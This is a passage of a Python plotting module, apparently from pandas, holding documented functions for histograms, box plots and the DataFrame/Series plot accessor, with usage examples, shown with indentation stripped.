A histogram plot.
See Also
--------
matplotlib.axes.Axes.hist : Plot a histogram using matplotlib.
"""
plot_backend = _get_plot_backend(backend)
return plot_backend.hist_series(
self,
by=by,
ax=ax,
grid=grid,
xlabelsize=xlabelsize,
xrot=xrot,
ylabelsize=ylabelsize,
yrot=yrot,
figsize=figsize,
bins=bins,
legend=legend,
**kwargs,
)
def hist_frame(
data: DataFrame,
column: IndexLabel = None,
by=None,
grid: bool = True,
xlabelsize: Optional[int] = None,
xrot: Optional[float] = None,
ylabelsize: Optional[int] = None,
yrot: Optional[float] = None,
ax=None,
sharex: bool = False,
sharey: bool = False,
figsize: Optional[Tuple[int, int]] = None,
layout: Optional[Tuple[int, int]] = None,
bins: Union[int, Sequence[int]] = 10,
backend: Optional[str] = None,
legend: bool = False,
**kwargs,
):
"""
Make a histogram of the DataFrame's.
A `histogram`_ is a representation of the distribution of data.
This function calls :meth:`matplotlib.pyplot.hist`, on each series in
the DataFrame, resulting in one histogram per column.
.. _histogram: https://en.wikipedia.org/wiki/Histogram
Parameters
----------
data : DataFrame
The pandas object holding the data.
column : str or sequence
If passed, will be used to limit data to a subset of columns.
by : object, optional
If passed, then used to form histograms for separate groups.
grid : bool, default True
Whether to show axis grid lines.
xlabelsize : int, default None
If specified changes the x-axis label size.
xrot : float, default None
Rotation of x axis labels. For example, a value of 90 displays the
x labels rotated 90 degrees clockwise.
ylabelsize : int, default None
If specified changes the y-axis label size.
yrot : float, default None
Rotation of y axis labels. For example, a value of 90 displays the
y labels rotated 90 degrees clockwise.
ax : Matplotlib axes object, default None
The axes to plot the histogram on.
sharex : bool, default True if ax is None else False
In case subplots=True, share x axis and set some x axis labels to
invisible; defaults to True if ax is None otherwise False if an ax
is passed in.
Note that passing in both an ax and sharex=True will alter all x axis
labels for all subplots in a figure.
sharey : bool, default False
In case subplots=True, share y axis and set some y axis labels to
invisible.
figsize : tuple
The size in inches of the figure to create. Uses the value in
`matplotlib.rcParams` by default.
layout : tuple, optional
Tuple of (rows, columns) for the layout of the histograms.
bins : int or sequence, default 10
Number of histogram bins to be used. If an integer is given, bins + 1
bin edges are calculated and returned. If bins is a sequence, gives
bin edges, including left edge of first bin and right edge of last
bin. In this case, bins is returned unmodified.
backend : str, default None
Backend to use instead of the backend specified in the option
``plotting.backend``. For instance, 'matplotlib'. Alternatively, to
specify the ``plotting.backend`` for the whole session, set
``pd.options.plotting.backend``.
.. versionadded:: 1.0.0
legend : bool, default False
Whether to show the legend.
.. versionadded:: 1.1.0
**kwargs
All other plotting keyword arguments to be passed to
:meth:`matplotlib.pyplot.hist`.
Returns
-------
matplotlib.AxesSubplot or numpy.ndarray of them
See Also
--------
matplotlib.pyplot.hist : Plot a histogram using matplotlib.
Examples
--------
This example draws a histogram based on the length and width of
some animals, displayed in three bins
.. plot::
:context: close-figs
>>> df = pd.DataFrame({
... 'length': [1.5, 0.5, 1.2, 0.9, 3],
... 'width': [0.7, 0.2, 0.15, 0.2, 1.1]
... }, index=['pig', 'rabbit', 'duck', 'chicken', 'horse'])
>>> hist = df.hist(bins=3)
"""
plot_backend = _get_plot_backend(backend)
return plot_backend.hist_frame(
data,
column=column,
by=by,
grid=grid,
xlabelsize=xlabelsize,
xrot=xrot,
ylabelsize=ylabelsize,
yrot=yrot,
ax=ax,
sharex=sharex,
sharey=sharey,
figsize=figsize,
layout=layout,
legend=legend,
bins=bins,
**kwargs,
)
_boxplot_doc = """
Make a box plot from DataFrame columns.
Make a box-and-whisker plot from DataFrame columns, optionally grouped
by some other columns. A box plot is a method for graphically depicting
groups of numerical data through their quartiles.
The box extends from the Q1 to Q3 quartile values of the data,
with a line at the median (Q2). The whiskers extend from the edges
of box to show the range of the data. By default, they extend no more than
`1.5 * IQR (IQR = Q3 - Q1)` from the edges of the box, ending at the farthest
data point within that interval. Outliers are plotted as separate dots.
For further details see
Wikipedia's entry for `boxplot <https://en.wikipedia.org/wiki/Box_plot>`_.
Parameters
----------
column : str or list of str, optional
Column name or list of names, or vector.
Can be any valid input to :meth:`pandas.DataFrame.groupby`.
by : str or array-like, optional
Column in the DataFrame to :meth:`pandas.DataFrame.groupby`.
One box-plot will be done per value of columns in `by`.
ax : object of class matplotlib.axes.Axes, optional
The matplotlib axes to be used by boxplot.
fontsize : float or str
Tick label font size in points or as a string (e.g., `large`).
rot : int or float, default 0
The rotation angle of labels (in degrees)
with respect to the screen coordinate system.
grid : bool, default True
Setting this to True will show the grid.
figsize : A tuple (width, height) in inches
The size of the figure to create in matplotlib.
layout : tuple (rows, columns), optional
For example, (3, 5) will display the subplots
using 3 columns and 5 rows, starting from the top-left.
return_type : {'axes', 'dict', 'both'} or None, default 'axes'
The kind of object to return. The default is ``axes``.
* 'axes' returns the matplotlib axes the boxplot is drawn on.
* 'dict' returns a dictionary whose values are the matplotlib
Lines of the boxplot.
* 'both' returns a namedtuple with the axes and dict.
* when grouping with ``by``, a Series mapping columns to
``return_type`` is returned.
If ``return_type`` is `None`, a NumPy array
of axes with the same shape as ``layout`` is returned.
%(backend)s\
**kwargs
All other plotting keyword arguments to be passed to
:func:`matplotlib.pyplot.boxplot`.
Returns
-------
result
See Notes.
See Also
--------
Series.plot.hist: Make a histogram.
matplotlib.pyplot.boxplot : Matplotlib equivalent plot.
Notes
-----
The return type depends on the `return_type` parameter:
* 'axes' : object of class matplotlib.axes.Axes
* 'dict' : dict of matplotlib.lines.Line2D objects
* 'both' : a namedtuple with structure (ax, lines)
For data grouped with ``by``, return a Series of the above or a numpy
array:
* :class:`~pandas.Series`
* :class:`~numpy.array` (for ``return_type = None``)
Use ``return_type='dict'`` when you want to tweak the appearance
of the lines after plotting. In this case a dict containing the Lines
making up the boxes, caps, fliers, medians, and whiskers is returned.
Examples
--------
Boxplots can be created for every column in the dataframe
by ``df.boxplot()`` or indicating the columns to be used:
.. plot::
:context: close-figs
>>> np.random.seed(1234)
>>> df = pd.DataFrame(np.random.randn(10, 4),
... columns=['Col1', 'Col2', 'Col3', 'Col4'])
>>> boxplot = df.boxplot(column=['Col1', 'Col2', 'Col3'])
Boxplots of variables distributions grouped by the values of a third
variable can be created using the option ``by``. For instance:
.. plot::
:context: close-figs
>>> df = pd.DataFrame(np.random.randn(10, 2),
... columns=['Col1', 'Col2'])
>>> df['X'] = pd.Series(['A', 'A', 'A', 'A', 'A',
... 'B', 'B', 'B', 'B', 'B'])
>>> boxplot = df.boxplot(by='X')
A list of strings (i.e. ``['X', 'Y']``) can be passed to boxplot
in order to group the data by combination of the variables in the x-axis:
.. plot::
:context: close-figs
>>> df = pd.DataFrame(np.random.randn(10, 3),
... columns=['Col1', 'Col2', 'Col3'])
>>> df['X'] = pd.Series(['A', 'A', 'A', 'A', 'A',
... 'B', 'B', 'B', 'B', 'B'])
>>> df['Y'] = pd.Series(['A', 'B', 'A', 'B', 'A',
... 'B', 'A', 'B', 'A', 'B'])
>>> boxplot = df.boxplot(column=['Col1', 'Col2'], by=['X', 'Y'])
The layout of boxplot can be adjusted giving a tuple to ``layout``:
.. plot::
:context: close-figs
>>> boxplot = df.boxplot(column=['Col1', 'Col2'], by='X',
... layout=(2, 1))
Additional formatting can be done to the boxplot, like suppressing the grid
(``grid=False``), rotating the labels in the x-axis (i.e. ``rot=45``)
or changing the fontsize (i.e. ``fontsize=15``):
.. plot::
:context: close-figs
>>> boxplot = df.boxplot(grid=False, rot=45, fontsize=15)
The parameter ``return_type`` can be used to select the type of element
returned by `boxplot`. When ``return_type='axes'`` is selected,
the matplotlib axes on which the boxplot is drawn are returned:
>>> boxplot = df.boxplot(column=['Col1', 'Col2'], return_type='axes')
>>> type(boxplot)
<class 'matplotlib.axes._subplots.AxesSubplot'>
When grouping with ``by``, a Series mapping columns to ``return_type``
is returned:
>>> boxplot = df.boxplot(column=['Col1', 'Col2'], by='X',
... return_type='axes')
>>> type(boxplot)
<class 'pandas.core.series.Series'>
If ``return_type`` is `None`, a NumPy array of axes with the same shape
as ``layout`` is returned:
>>> boxplot = df.boxplot(column=['Col1', 'Col2'], by='X',
... return_type=None)
>>> type(boxplot)
<class 'numpy.ndarray'>
"""
_backend_doc = """\
backend : str, default None
Backend to use instead of the backend specified in the option
``plotting.backend``. For instance, 'matplotlib'. Alternatively, to
specify the ``plotting.backend`` for the whole session, set
``pd.options.plotting.backend``.
.. versionadded:: 1.0.0
"""
_bar_or_line_doc = """
Parameters
----------
x : label or position, optional
Allows plotting of one column versus another. If not specified,
the index of the DataFrame is used.
y : label or position, optional
Allows plotting of one column versus another. If not specified,
all numerical columns are used.
color : str, array_like, or dict, optional
The color for each of the DataFrame's columns. Possible values are:
- A single color string referred to by name, RGB or RGBA code,
for instance 'red' or '#a98d19'.
- A sequence of color strings referred to by name, RGB or RGBA
code, which will be used for each column recursively. For
instance ['green','yellow'] each column's %(kind)s will be filled in
green or yellow, alternatively. If there is only a single column to
be plotted, then only the first color from the color list will be
used.
- A dict of the form {column name : color}, so that each column will be
colored accordingly. For example, if your columns are called `a` and
`b`, then passing {'a': 'green', 'b': 'red'} will color %(kind)ss for
column `a` in green and %(kind)ss for column `b` in red.
.. versionadded:: 1.1.0
**kwargs
Additional keyword arguments are documented in
:meth:`DataFrame.plot`.
Returns
-------
matplotlib.axes.Axes or np.ndarray of them
An ndarray is returned with one :class:`matplotlib.axes.Axes`
per column when ``subplots=True``.
"""
@Substitution(backend="")
@Appender(_boxplot_doc)
def boxplot(
data,
column=None,
by=None,
ax=None,
fontsize=None,
rot=0,
grid=True,
figsize=None,
layout=None,
return_type=None,
**kwargs,
):
plot_backend = _get_plot_backend("matplotlib")
return plot_backend.boxplot(
data,
column=column,
by=by,
ax=ax,
fontsize=fontsize,
rot=rot,
grid=grid,
figsize=figsize,
layout=layout,
return_type=return_type,
**kwargs,
)
@Substitution(backend=_backend_doc)
@Appender(_boxplot_doc)
def boxplot_frame(
self,
column=None,
by=None,
ax=None,
fontsize=None,
rot=0,
grid=True,
figsize=None,
layout=None,
return_type=None,
backend=None,
**kwargs,
):
plot_backend = _get_plot_backend(backend)
return plot_backend.boxplot_frame(
self,
column=column,
by=by,
ax=ax,
fontsize=fontsize,
rot=rot,
grid=grid,
figsize=figsize,
layout=layout,
return_type=return_type,
**kwargs,
)
def boxplot_frame_groupby(
grouped,
subplots=True,
column=None,
fontsize=None,
rot=0,
grid=True,
ax=None,
figsize=None,
layout=None,
sharex=False,
sharey=True,
backend=None,
**kwargs,
):
"""
Make box plots from DataFrameGroupBy data.
Parameters
----------
grouped : Grouped DataFrame
subplots : bool
* ``False`` - no subplots will be used
* ``True`` - create a subplot for each group.
column : column name or list of names, or vector
Can be any valid input to groupby.
fontsize : int or str
rot : label rotation angle
grid : Setting this to True will show the grid
ax : Matplotlib axis object, default None
figsize : A tuple (width, height) in inches
layout : tuple (optional)
The layout of the plot: (rows, columns).
sharex : bool, default False
Whether x-axes will be shared among subplots.
sharey : bool, default True
Whether y-axes will be shared among subplots.
backend : str, default None
Backend to use instead of the backend specified in the option
``plotting.backend``. For instance, 'matplotlib'. Alternatively, to
specify the ``plotting.backend`` for the whole session, set
``pd.options.plotting.backend``.
.. versionadded:: 1.0.0
**kwargs
All other plotting keyword arguments to be passed to
matplotlib's boxplot function.
Returns
-------
dict of key/value = group key/DataFrame.boxplot return value
or DataFrame.boxplot return value in case subplots=figures=False
Examples
--------
You can create boxplots for grouped data and show them as separate subplots:
.. plot::
:context: close-figs
>>> import itertools
>>> tuples = [t for t in itertools.product(range(1000), range(4))]
>>> index = pd.MultiIndex.from_tuples(tuples, names=['lvl0', 'lvl1'])
>>> data = np.random.randn(len(index),4)
>>> df = pd.DataFrame(data, columns=list('ABCD'), index=index)
>>> grouped = df.groupby(level='lvl1')
>>> grouped.boxplot(rot=45, fontsize=12, figsize=(8,10))
The ``subplots=False`` option shows the boxplots in a single figure.
.. plot::
:context: close-figs
>>> grouped.boxplot(subplots=False, rot=45, fontsize=12)
"""
plot_backend = _get_plot_backend(backend)
return plot_backend.boxplot_frame_groupby(
grouped,
subplots=subplots,
column=column,
fontsize=fontsize,
rot=rot,
grid=grid,
ax=ax,
figsize=figsize,
layout=layout,
sharex=sharex,
sharey=sharey,
**kwargs,
)
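# Illustrative sketch (an assumption, shown as comments to keep this module
# import-safe): selecting the plotting backend per call or for the session.
#
#   import pandas as pd
#   df = pd.DataFrame({"a": [1, 2, 3]})
#   df.plot(kind="line", backend="matplotlib")      # per-call backend override
#   pd.options.plotting.backend = "matplotlib"      # session-wide default
#   ax = df.plot.bar(y="a")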
class PlotAccessor(PandasObject):
"""
Make plots of Series or DataFrame.
Uses the backend specified by the
option ``plotting.backend``. By default, matplotlib is used.
Parameters
----------
data : Series or DataFrame
The object for which the method is called.
x : label or position, default None
Only used if data is a DataFrame.
y : label, position or list of label, positions, default None
Allows plotting of one column versus another. Only used if data is a
DataFrame.
kind : str
The kind of plot to produce:
- 'line' : line plot (default)
- 'bar' : vertical bar plot
- 'barh' : horizontal bar plot
- 'hist' : histogram
- 'box' : boxplot
- 'kde' : Kernel Density Estimation plot
- 'density' : same as 'kde'
- 'area' : area plot
- 'pie' : pie plot
- 'scatter' : scatter plot (DataFrame only)
- 'hexbin' : hexbin plot (DataFrame only)
ax : matplotlib axes object, default None
An axes of the current figure.
subplots : bool, default False
Make separate subplots for each column.
sharex : bool, default True if ax is None else False
In case ``subplots=True``, share x axis and set some x axis labels
to invisible; defaults to True if ax is None otherwise False if
an ax is passed in; Be aware, that passing in both an ax and
``sharex=True`` will alter all x axis labels for all axis in a figure.
sharey : bool, default False
In case ``subplots=True``, share y axis and set some y axis labels to invisible.
layout : tuple, optional
(rows, columns) for the layout of subplots.
figsize : a tuple (width, height) in inches
Size of a figure object.
use_index : bool, default True
Use index as ticks for x axis.
title : str or list
Title to use for the plot. If a string is passed, print the string
at the top of the figure. If a list is passed and `subplots` is
True, print each item in the list above the corresponding subplot.
grid : bool, default None (matlab style default)
Axis grid lines.
legend : bool or {'reverse'}
Place legend on axis subplots.
style : list or dict
The matplotlib line style per column.
logx : bool or 'sym', default False
Use log scaling or symlog scaling on x axis.
.. versionchanged:: 0.25.0
logy : bool or 'sym' default False
Use log scaling or symlog scaling on y axis.
.. versionchanged:: 0.25.0
loglog : bool or 'sym', default False
Use log scaling or symlog scaling on both x and y axes.
.. versionchanged:: 0.25.0
xticks : sequence
Values to use for the xticks.
yticks : sequence
Values to use for the yticks.
xlim : 2-tuple/list
Set the x limits of the current axes.
ylim : 2-tuple/list
Set the y limits of the current axes.
xlabel : label, optional
Name to use for the xlabel on x-axis. Default uses index name as xlabel, or the
x-column name for planar plots.
.. versionadded:: 1.1.0
.. versionchanged:: 1.2.0
Now applicable to planar plots (`scatter`, `hexbin`).
ylabel : label, optional
Name to use for the ylabel on y-axis. Default will show no ylabel, or the
y-column name for planar plots.
.. versionadded:: 1.1.0
.. versionchanged:: 1.2.0
Now applicable to planar plots (`scatter`, `hexbin`).
rot : int, default None
Rotation for ticks (xticks for vertical, yticks for horizontal
plots).
fontsize : int, default None
Font size for xticks and yticks.
colormap : str or matplotlib colormap object, default None
Colormap to select colors from. If string, load colormap with that
name from matplotlib.
colorbar : bool, optional
If True, plot colorbar (only relevant for 'scatter' and 'hexbin'
plots).
position : float
Specify relative alignments for bar plot layout.
From 0 (left/bottom-end) to 1 (right/top-end). Default is 0.5
(center).
table : bool, Series or DataFrame, default False
If True, draw a table using the data in the DataFrame and the data
will be transposed to meet matplotlib's default layout.
If a Series or DataFrame is passed, use passed data to draw a
table.
yerr : DataFrame, Series, array-like, dict and str
See :ref:`Plotting with Error Bars <visualization.errorbars>` for
detail.
xerr : DataFrame, Series, array-like, dict and str
Equivalent to yerr.
stacked : bool, default False in line and bar plots, and True in area plot
If True, create stacked plot.
sort_columns : bool, default False
Sort column names to determine plot ordering.
secondary_y : bool or sequence, default False
Whether to plot on the secondary y-axis if a list/tuple, which
columns to plot on secondary y-axis.
mark_right : bool, default True
When using a secondary_y axis, automatically mark the column
labels with "(right)" in the legend.
include_bool : bool, default is False
If True, boolean values can be plotted.
backend : str, default None
Backend to use instead of the backend specified in the option
``plotting.backend``. For instance, 'matplotlib'. Alternatively, to
specify the ``plotting.backend`` for the whole session, set
``pd.options.plotting.backend``.
.. versionadded:: 1.0.0
**kwargs
Options to pass to matplotlib plotting method.
Returns
-------
:class:`matplotlib.axes.Axes` or numpy.ndarray of them
If the backend is not the default matplotlib one, the return value
will be the object returned by the backend.
Notes
-----
- See matplotlib documentation online for more on this subject
- If `kind` = 'bar' or 'barh', you can specify relative alignments
for bar plot layout by `position` keyword.
From 0 (left/bottom-end) to 1 (right/top-end). Default is 0.5
(center)
"""
_common_kinds = ("line", "bar", "barh", "kde", "density", "area", "hist", "box")
_series_kinds = ("pie",)
_dataframe_kinds = ("scatter", "hexbin")
_kind_aliases = {"density": "kde"}
_all_kinds = _common_kinds + _series_kinds + _dataframe_kinds
def __init__(self, data):
self._parent = data
@staticmethod
def _get_call_args(backend_name, data, args, kwargs):
"""
This function makes calls to this accessor `__call__` method compatible
with the previous `SeriesPlotMethods.__call__` and
`DataFramePlotMethods.__call__`. Those had slightly different
signatures, since `DataFramePlotMethods` accepted `x` and `y`
parameters.
"""
if isinstance(data, ABCSeries):
arg_def = [
("kind", "line"),
("ax", None),
("figsize", None),
("use_index", True),
("title", None),
("grid", None),
("legend", False),
("style", None),
("logx", False),
("logy", False),
("loglog", False),
("xticks", None),
("yticks", None),
("xlim", None),
("ylim", None),
("rot", None),
("fontsize", None),
("colormap", None),
("table", False),
("yerr", None),
("xerr", None),
("label", None),
("secondary_y", False),
("xlabel", None),
("ylabel", None),
]
elif isinstance(data, ABCDataFrame):
arg_def = [
("x", None),
("y", None),
("kind", "line"),
("ax", None),
("subplots", False),
("sharex", None),
("sharey", False),
("layout", None),
("figsize", None),
("use_index", True),
("title", None),
("grid", None),
("legend", True),
("style", None),
("logx", False),
("logy", False),
("loglog", False),
("xticks", None),
("yticks", None),
("xlim", None),
("ylim", None),
("rot", None),
("fontsize", None),
("colormap", None),
("table", False),
("yerr", None),
("xerr", None),
("secondary_y", False),
("sort_columns", False),
("xlabel", None),
("ylabel", None),
]
else:
raise TypeError(
f"Called plot accessor for type {type(data).__name__}, "
"expected Series or DataFrame"
)
if args and isinstance(data, ABCSeries):
positional_args = str(args)[1:-1]
keyword_args = ", ".join(
f"{name}={repr(value)}" for (name, default), value in zip(arg_def, args)
)
msg = (
"`Series.plot()` should not be called with positional "
"arguments, only keyword arguments. The order of "
"positional arguments will change in the future. "
f"Use `Series.plot({keyword_args})` instead of "
f"`Series.plot({positional_args})`."
)
raise TypeError(msg)
pos_args = {name: value for value, (name, _) in zip(args, arg_def)}
if backend_name == "pandas.plotting._matplotlib":
kwargs = dict(arg_def, **pos_args, **kwargs)
else:
kwargs = dict(pos_args, **kwargs)
x = kwargs.pop("x", None)
y = kwargs.pop("y", None)
kind = kwargs.pop("kind", "line")
return x, y, kind, kwargs
def __call__(self, *args, **kwargs):
plot_backend = _get_plot_backend(kwargs.pop("backend", None))
x, y, kind, kwargs = self._get_call_args(
plot_backend.__name__, self._parent, args, kwargs
)
kind = self._kind_aliases.get(kind, kind)
# when using another backend, get out of the way
if plot_backend.__name__ != "pandas.plotting._matplotlib":
return plot_backend.plot(self._parent, x=x, y=y, kind=kind, **kwargs)
if kind not in self._all_kinds:
raise ValueError(f"{kind} is not a valid plot kind")
# The original data structured can be transformed before passed to the
# backend. For example, for DataFrame is common to set the index as the
# `x` parameter, and return a Series with the parameter `y` as values.
data = self._parent.copy()
if isinstance(data, ABCSeries):
kwargs["reuse_plot"] = True
if kind in self._dataframe_kinds:
if isinstance(data, ABCDataFrame):
return plot_backend.plot(data, x=x, y=y, kind=kind, **kwargs)
else:
raise ValueError(f"plot kind {kind} can only be used for data frames")
elif kind in self._series_kinds:
if isinstance(data, ABCDataFrame):
if y is None and kwargs.get("subplots") is False:
raise ValueError(
f"{kind} requires either y column or 'subplots=True'"
)
elif y is not None:
if is_integer(y) and not data.columns.holds_integer():
y = data.columns[y]
# converted to series actually. copy to not modify
data = data[y].copy()
data.index.name = y
elif isinstance(data, ABCDataFrame):
data_cols = data.columns
if x is not None:
if is_integer(x) and not data.columns.holds_integer():
x = data_cols[x]
elif not isinstance(data[x], ABCSeries):
raise ValueError("x must be a label or position")
data = data.set_index(x)
if y is not None:
# check if we have y as int or list of ints
int_ylist = is_list_like(y) and all(is_integer(c) for c in y)
int_y_arg = is_integer(y) or int_ylist
if int_y_arg and not data.columns.holds_integer():
y = data_cols[y]
label_kw = kwargs["label"] if "label" in kwargs else False
for kw in ["xerr", "yerr"]:
if kw in kwargs and (
isinstance(kwargs[kw], str) or is_integer(kwargs[kw])
):
try:
kwargs[kw] = data[kwargs[kw]]
except (IndexError, KeyError, TypeError):
pass
# don't overwrite
data = data[y].copy()
if isinstance(data, ABCSeries):
label_name = label_kw or y
data.name = label_name
else:
match = is_list_like(label_kw) and len(label_kw) == len(y)
if label_kw and not match:
raise ValueError(
"label should be list-like and same length as y"
)
label_name = label_kw or data.columns
data.columns = label_name
return plot_backend.plot(data, kind=kind, **kwargs)
__call__.__doc__ = __doc__
@Appender(
"""
See Also
--------
matplotlib.pyplot.plot : Plot y versus x as lines and/or markers.
Examples
--------
.. plot::
:context: close-figs
>>> s = pd.Series([1, 3, 2])
>>> s.plot.line()
.. plot::
:context: close-figs
The following example shows the populations for some animals
over the years.
>>> df = pd.DataFrame({
... 'pig': [20, 18, 489, 675, 1776],
... 'horse': [4, 25, 281, 600, 1900]
... }, index=[1990, 1997, 2003, 2009, 2014])
>>> lines = df.plot.line()
.. plot::
:context: close-figs
An example with subplots, so an array of axes is returned.
>>> axes = df.plot.line(subplots=True)
>>> type(axes)
<class 'numpy.ndarray'>
.. plot::
:context: close-figs
Let's repeat the same example, but specifying colors for
each column (in this case, for each animal).
>>> axes = df.plot.line(
... subplots=True, color={"pig": "pink", "horse": "#742802"}
... )
.. plot::
:context: close-figs
The following example shows the relationship between both
populations.
>>> lines = df.plot.line(x='pig', y='horse')
"""
)
@Substitution(kind="line")
@Appender(_bar_or_line_doc)
def line(self, x=None, y=None, **kwargs):
"""
Plot Series or DataFrame as lines.
This function is useful to plot lines using DataFrame's values
as coordinates.
"""
return self(kind="line", x=x, y=y, **kwargs)
@Appender(
"""
See Also
--------
DataFrame.plot.barh : Horizontal bar plot.
DataFrame.plot : Make plots of a DataFrame.
matplotlib.pyplot.bar : Make a bar plot with matplotlib.
Examples
--------
Basic plot.
.. plot::
:context: close-figs
>>> df = pd.DataFrame({'lab':['A', 'B', 'C'], 'val':[10, 30, 20]})
>>> ax = df.plot.bar(x='lab', y='val', rot=0)
Plot a whole dataframe to a bar plot. Each column is assigned a
distinct color, and each row is nested in a group along the
horizontal axis.
.. plot::
:context: close-figs
>>> speed = [0.1, 17.5, 40, 48, 52, 69, 88]
>>> lifespan = [2, 8, 70, 1.5, 25, 12, 28]
>>> index = ['snail', 'pig', 'elephant',
... 'rabbit', 'giraffe', 'coyote', 'horse']
>>> df = pd.DataFrame({'speed': speed,
... 'lifespan': lifespan}, index=index)
>>> ax = df.plot.bar(rot=0)
Plot stacked bar charts for the DataFrame
.. plot::
:context: close-figs
>>> ax = df.plot.bar(stacked=True)
Instead of nesting, the figure can be split by column with
``subplots=True``. In this case, a :class:`numpy.ndarray` of
:class:`matplotlib.axes.Axes` are returned.
.. plot::
:context: close-figs
>>> axes = df.plot.bar(rot=0, subplots=True)
>>> axes[1].legend(loc=2) # doctest: +SKIP
If you don't like the default colours, you can specify how you'd
like each column to be colored.
.. plot::
:context: close-figs
>>> axes = df.plot.bar(
... rot=0, subplots=True, color={"speed": "red", "lifespan": "green"}
... )
>>> axes[1].legend(loc=2) # doctest: +SKIP
Plot a single column.
.. plot::
:context: close-figs
>>> ax = df.plot.bar(y='speed', rot=0)
Plot only selected categories for the DataFrame.
.. plot::
:context: close-figs
>>> ax = df.plot.bar(x='lifespan', rot=0)
"""
)
@Substitution(kind="bar")
@Appender(_bar_or_line_doc)
def bar(self, x=None, y=None, **kwargs):
"""
Vertical bar plot.
A bar plot is a plot that presents categorical data with
rectangular bars with lengths proportional to the values that they
represent. A bar plot shows comparisons among discrete categories. One
axis of the plot shows the specific categories being compared, and the
other axis represents a measured value.
"""
return self(kind="bar", x=x, y=y, **kwargs)
@Appender(
"""
See Also
--------
DataFrame.plot.bar: Vertical bar plot.
DataFrame.plot : Make plots of DataFrame using matplotlib.
matplotlib.axes.Axes.bar : Plot a vertical bar plot using matplotlib.
Examples
--------
Basic example
.. plot::
:context: close-figs
>>> df = pd.DataFrame({'lab': ['A', 'B', 'C'], 'val': [10, 30, 20]})
>>> ax = df.plot.barh(x='lab', y='val')
Plot a whole DataFrame to a horizontal bar plot
.. plot::
:context: close-figs
>>> speed = [0.1, 17.5, 40, 48, 52, 69, 88]
>>> lifespan = [2, 8, 70, 1.5, 25, 12, 28]
>>> index = ['snail', 'pig', 'elephant',
... 'rabbit', 'giraffe', 'coyote', 'horse']
>>> df = pd.DataFrame({'speed': speed,
... 'lifespan': lifespan}, index=index)
>>> ax = df.plot.barh()
Plot stacked barh charts for the DataFrame
.. plot::
:context: close-figs
>>> ax = df.plot.barh(stacked=True)
We can specify colors for each column
.. plot::
:context: close-figs
>>> ax = df.plot.barh(color={"speed": "red", "lifespan": "green"})
Plot a column of the DataFrame to a horizontal bar plot
.. plot::
:context: close-figs
>>> speed = [0.1, 17.5, 40, 48, 52, 69, 88]
>>> lifespan = [2, 8, 70, 1.5, 25, 12, 28]
>>> index = ['snail', 'pig', 'elephant',
... 'rabbit', 'giraffe', 'coyote', 'horse']
>>> df = pd.DataFrame({'speed': speed,
... 'lifespan': lifespan}, index=index)
>>> ax = df.plot.barh(y='speed')
Plot DataFrame versus the desired column
.. plot::
:context: close-figs
>>> speed = [0.1, 17.5, 40, 48, 52, 69, 88]
>>> lifespan = [2, 8, 70, 1.5, 25, 12, 28]
>>> index = ['snail', 'pig', 'elephant',
... 'rabbit', 'giraffe', 'coyote', 'horse']
>>> df = pd.DataFrame({'speed': speed,
... 'lifespan': lifespan}, index=index)
>>> ax = df.plot.barh(x='lifespan')
"""
)
@Substitution(kind="bar")
@Appender(_bar_or_line_doc)
def barh(self, x=None, y=None, **kwargs):
"""
Make a horizontal bar plot.
A horizontal bar plot is a plot that presents quantitative data with
rectangular bars with lengths proportional to the values that they
represent. A bar plot shows comparisons among discrete categories. One
axis of the plot shows the specific categories being compared, and the
other axis represents a measured value.
"""
return self(kind="barh", x=x, y=y, **kwargs)
def box(self, by=None, **kwargs):
r"""
Make a box plot of the DataFrame columns.
A box plot is a method for graphically depicting groups of numerical
data through their quartiles.
The box extends from the Q1 to Q3 quartile values of the data,
with a line at the median (Q2). The whiskers extend from the edges
of box to show the range of the data. The position of the whiskers
is set by default to 1.5*IQR (IQR = Q3 - Q1) from the edges of the
box. Outlier points are those past the end of the whiskers.
For further details see Wikipedia's
entry for `boxplot <https://en.wikipedia.org/wiki/Box_plot>`__.
A consideration when using this chart is that the box and the whiskers
can overlap, which is very common when plotting small sets of data.
Parameters
----------
by : str or sequence
Column in the DataFrame to group by.
**kwargs
Additional keywords are documented in
:meth:`DataFrame.plot`.
Returns
-------
:class:`matplotlib.axes.Axes` or numpy.ndarray of them
See Also
--------
DataFrame.boxplot: Another method to draw a box plot.
Series.plot.box: Draw a box plot from a Series object.
matplotlib.pyplot.boxplot: Draw a box plot in matplotlib.
Examples
--------
Draw a box plot from a DataFrame with four columns of randomly
generated data.
.. plot::
:context: close-figs
>>> data = np.random.randn(25, 4)
>>> df = pd.DataFrame(data, columns=list('ABCD'))
>>> ax = df.plot.box()
"""
return self(kind="box", by=by, **kwargs)
def hist(self, by=None, bins=10, **kwargs):
"""
Draw one histogram of the DataFrame's columns.
A histogram is a representation of the distribution of data.
This function groups the values of all given Series in the DataFrame
into bins and draws all bins in one :class:`matplotlib.axes.Axes`.
This is useful when the DataFrame's Series are in a similar scale.
Parameters
----------
by : str or sequence, optional
Column in the DataFrame to group by.
bins : int, default 10
Number of histogram bins to be used.
**kwargs
Additional keyword arguments are documented in
:meth:`DataFrame.plot`.
Returns
-------
:class:`matplotlib.AxesSubplot`
Return a histogram plot.
See Also
--------
DataFrame.hist : Draw histograms per DataFrame's Series.
Series.hist : Draw a histogram with Series' data.
Examples
--------
When we roll a die 6000 times, we expect to get each value around 1000
times. But when we roll two dice and sum the result, the distribution
is going to be quite different. A histogram illustrates those
distributions.
.. plot::
:context: close-figs
>>> df = pd.DataFrame(
... np.random.randint(1, 7, 6000),
... columns = ['one'])
>>> df['two'] = df['one'] + np.random.randint(1, 7, 6000)
>>> ax = df.plot.hist(bins=12, alpha=0.5)
"""
return self(kind="hist", by=by, bins=bins, **kwargs)
def kde(self, bw_method=None, ind=None, **kwargs):
"""
Generate Kernel Density Estimate plot using Gaussian kernels.
In statistics, `kernel density estimation`_ (KDE) is a non-parametric
way to estimate the probability density function (PDF) of a random
variable. This function uses Gaussian kernels and includes automatic
bandwidth determination.
.. _kernel density estimation:
https://en.wikipedia.org/wiki/Kernel_density_estimation
Parameters
----------
bw_method : str, scalar or callable, optional
The method used to calculate the estimator bandwidth. This can be
'scott', 'silverman', a scalar constant or a callable.
If None (default), 'scott' is used.
See :class:`scipy.stats.gaussian_kde` for more information.
ind : NumPy array or int, optional
Evaluation points for the estimated PDF. If None (default),
1000 equally spaced points are used. If `ind` is a NumPy array, the
KDE is evaluated at the points passed. If `ind` is an integer,
`ind` number of equally spaced points are used.
**kwargs
Additional keyword arguments are documented in
:meth:`pandas.%(this-datatype)s.plot`.
Returns
-------
matplotlib.axes.Axes or numpy.ndarray of them
See Also
--------
